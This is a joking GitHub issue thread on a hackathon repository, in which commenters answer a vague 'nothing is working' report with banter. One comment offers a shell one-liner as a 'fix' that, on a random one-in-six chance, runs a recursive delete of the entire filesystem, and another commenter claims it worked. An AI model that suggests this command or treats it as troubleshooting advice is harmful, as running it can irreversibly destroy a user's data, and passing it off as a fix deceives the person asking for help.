### ISSUE TITLE
help nothing is working

### ISSUE THREAD

**Issue by annygakh** [landalex/nwhacks2016web#1]

**Comment by landalex** [comment]
Cannot reproduce, please close

**Comment by annygakh** [comment]
its still not working

**Comment by yves-chan** [comment]
turn your computer off and on again

**Comment by Ogien** [comment]
That works for me. Try it out!

**Comment by landalex** [comment]
Wasn't working but running this fixed it for me: 
`[ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo "You live"`

**Comment by Ogien** [comment]
That worked too !!! Thanks man

**Comment by annygakh** [comment]
should I run this before I turn off my computer or afterwards? Im unable to run it after I turn off my computer for some reason.
